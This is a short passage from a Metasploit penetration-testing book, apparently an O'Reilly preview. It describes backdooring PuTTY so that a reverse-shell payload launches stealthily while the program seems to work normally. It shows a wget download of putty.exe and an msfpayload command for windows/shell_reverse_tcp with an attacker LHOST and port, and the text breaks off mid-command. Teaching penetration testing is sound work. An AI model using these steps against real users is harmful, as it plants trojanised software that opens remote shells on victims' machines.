Launching a Payload Stealthily
For the most part, when a targeted user launches a backdoored executable such as the one we just generated, nothing will appear to happen, and that can raise suspicions. To improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application, as shown here:
root@bt:/opt/framework3/msf3#wget http://the.earth.li/˜sgtatham/
putty/latest/x86/putty.exe
. . . SNIP . . .
2011-03-21 17:02:48 (133 KB/s) - 'putty.exe' saved [454656/454656] root@bt:/opt/framework3/msf3#msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.101 LPORT=8080 R | msfencode ...
Get Metasploit now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.